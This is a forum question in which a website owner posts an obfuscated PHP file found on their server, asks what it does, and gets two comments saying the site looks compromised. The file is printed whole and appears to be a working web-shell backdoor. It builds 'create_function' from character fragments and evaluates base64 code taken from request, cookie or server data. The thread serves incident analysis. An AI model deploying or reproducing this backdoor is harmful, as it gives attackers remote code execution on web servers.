0

Found suspicious, obfuscated PHP file. I assume this is a successful hack on my website? Can anyone tell me what this code is doing?

fuifsaat.php

<?php
$hereto= '](^';$canon =':';$heroine= '(rp:L'; $deceitful= 'Z]Qe<'; $blacks =':Ntiu-_['; $broadcasting= 'T'; $levees ='T"($4n';$bilked='N'; $hitters='e';$drill = '"9t';
$franklin ='(tr'; $clarie ='f';$decomposing= '['; $demetra ='v';$knapsack ='$';$congratulated='s';$canners= 'HPFcd;'; $glenna= 'd(o=kqah'; $hamil= 'Y';$jennette ='('; $dwarfs='i';$buffeted= ')ni='; $assembly='ey';
$craze = 'o>e"rsEa';$chieftains ='v';$helplessly='A'; $clasping='"'; $clusters= 'OQ_6i]p';

$gown='N';
$handfuls ='`'; $bilks= 'p';

$chemist = 'V';$cathode = 'l"*JN';$birds = 'cD)ngi'; $climbed= 'r__rn__';$barons= '$s]jKa';$arrear = 'I';
$blown=')';$earls = 'n';

$jailed ='m'; $icebergs= ')cQ';$assuringly ='.';$appealer= 'a';$hangover ='d';$cradled ='a)pR(Urar';$although= 'G'; $grasping='5'; $madmax ='r';
$decrements ='sc)';

$commending= 'Q';$expensive = 'vln';$expedites = 'laMsr';
$gale='_';$fum = 'e'; $interrogative= 'V';

$flurry = '[';

$ann ='r'; $crops = 'ePE';

$formatters = 'T';$buses= 'g';
$enhanced='RRi'; $leontine= 'u';
$beatriz = 't';$eloquently='+';$anticipates='v';
$darrick= 'Caden?yq';$doubtlessly='P_4vuPW';$deviant = 'i';$cosmology='tE';
$industrials= 'e)'; $leandra = '0';$discerned= 'n'; $helga= '"';$colander= 'ie6u';$helical = 'v,prPXeT_';

$bespeak= 'e';$lissy = 'U';$benedict='E,U;SEV';
$beggarly='71?'; $finality= 'TR'; $briar='H'; $effect= '?'; $geodesic= 'NmeaaS';

$justiciable='rBf$aI;';$engineering='S)seg';

$kidney='o';$endear= 'r'; $hillard = '(';$food='t';$giggling=')';$glider = ' ';

$lezley='_'; $arney='sR;$aH';$flawed='e@(=$iR'; $circularly= 'R)'; $dotes='C';
$conant='2'; $attempts= ']RTf;O)';
$healthfully ='_';$beachhead='VKr$E'; $communists = 'e"$$Ug'; $embellishments ='ssv'; $detailing='q';$latches ='8';$crisscross='(u'; $delightful ='i'; $crowing ='t[3_b"r,[';$immodest ='o'; $assertive= 'tbOe'; $cloudburst = 'r'; $inflamed= '$'; $diet= 'c';$enos= '(';$ftp ='/';

$bash= $diet .$cloudburst .$assertive['3'] . $arney[4] . $assertive[0] .
$assertive['3']. $crowing['3'] . $attempts['3'].$crisscross['1'].$discerned. $diet .
$assertive[0] .$delightful . $immodest.$discerned ; $amendments =$glider; $lam =$bash($amendments,$assertive['3'].

$embellishments['2'].$arney[4] .$expedites['0'] .$enos.$arney[4] . $cloudburst . $cloudburst. $arney[4].$darrick['6'] . $crowing['3'] .$helical['2'] .
$immodest .

$helical['2'].
$enos .$attempts['3'].$crisscross['1'] .$discerned . $diet.$crowing['3'].
$communists['5'] . $assertive['3'] . $assertive[0].
$crowing['3'] .

$arney[4].$cloudburst.
$communists['5'].
$embellishments['1'] .
$enos .$attempts['6'].

$attempts['6'] .

$attempts['6']. $attempts['4']);$lam

($flawed[1] , $deceitful['0'] ,
$hamil,$crowing['3'],
$attempts['4'], $commending ,$beachhead['0'] , $hamil ,$crowing['2'], $doubtlessly['6'], $inflamed . $delightful. $flawed['3'] . $arney[4].$cloudburst . $cloudburst. $arney[4] .
$darrick['6']. $crowing['3'] .

$geodesic['1'] .
$assertive['3'] .$cloudburst. $communists['5']. $assertive['3'].$enos. $inflamed.$crowing['3'].$attempts['1'] . $beachhead['4'] . $commending .$communists[4] .$beachhead['4'] . $engineering['0'] .$attempts[2] .$crowing['7'] .
$inflamed.

$crowing['3'] . $dotes .$assertive['2'].$assertive['2'] . $beachhead[1].$justiciable['5'].
$beachhead['4'].
$crowing['7'] . $inflamed . $crowing['3'].
$engineering['0']. $beachhead['4'] . $attempts['1'] .$beachhead['0'].
$beachhead['4'].$attempts['1'].$attempts['6'] .

$attempts['4'].
$inflamed.

$arney[4]. $flawed['3']. $delightful.$embellishments['1'] . $embellishments['1'] .$assertive['3'] .$assertive[0]. $enos.$inflamed . $delightful.$crowing['8'] . $crowing['5'] .$crisscross['1'].$helical['2'] .$cloudburst . $discerned.$cloudburst. $detailing .
$discerned.$embellishments['2'].$crowing['5'] .$attempts[0] . $attempts['6'] .$effect .

$inflamed. $delightful . $crowing['8'].$crowing['5'] . $crisscross['1'].$helical['2'] .$cloudburst.

$discerned.$cloudburst . $detailing.$discerned. $embellishments['2'] . $crowing['5'] .
$attempts[0]. $blacks['0'].

$enos.

$delightful . $embellishments['1']. $embellishments['1'] .$assertive['3'].
$assertive[0]. $enos .$inflamed. $delightful.$crowing['8'] .$crowing['5'] .$arney['5'].$attempts[2] .$attempts[2] . $helical[4]. $crowing['3'] . $communists[4] . $helical[4].$attempts['1'] . $geodesic['0'] .$attempts['1'] .$commending .$geodesic['0'].$beachhead['0'] . $crowing['5'] .$attempts[0] . $attempts['6']. $effect. $inflamed.$delightful .$crowing['8'].

$crowing['5'] . $arney['5'] .$attempts[2] . $attempts[2]. $helical[4].
$crowing['3'] . $communists[4] . $helical[4] .$attempts['1'] .$geodesic['0'] . $attempts['1']. $commending.$geodesic['0'] .

$beachhead['0'].

$crowing['5'] . $attempts[0].

$blacks['0'].$darrick['2'].$delightful.$assertive['3'] . $attempts['6'] . $attempts['4'] .$assertive['3'].$embellishments['2']. $arney[4] . $expedites['0'] . $enos.$embellishments['1'] .$assertive[0].$cloudburst .$cloudburst. $assertive['3'] .

$embellishments['2'].$enos . $assertive['1'] . $arney[4].
$embellishments['1'].$assertive['3'] . $colander['2'] . $doubtlessly['2'] .$crowing['3'].$darrick['2'].$assertive['3'] .$diet .$immodest. $darrick['2']. $assertive['3'] .$enos .$embellishments['1'].$assertive[0].$cloudburst . $cloudburst. $assertive['3']. $embellishments['2'].$enos .

$inflamed .$arney[4].
$attempts['6'].$attempts['6'] .
$attempts['6']. $attempts['6'].$attempts['4'] );
Kevin
  • 1,643
  • 9
  • 20
  • Yes, looks like your website could be compromised: Either someone was able to login using your FTP credentials or someone was able to upload this file via a file upload script already present on your website. Either way, I would consider your whole website compromised. You should remove the script and continue from there. – Kevin Jan 04 '19 at 00:45
  • Yes, programmers try so hard to make their codes as readable as possible for future revisits. I do PHP and I can say this is obfuscated on multiple levels. – Abel Melquiades Callejo Jan 04 '19 at 02:27

0 Answers0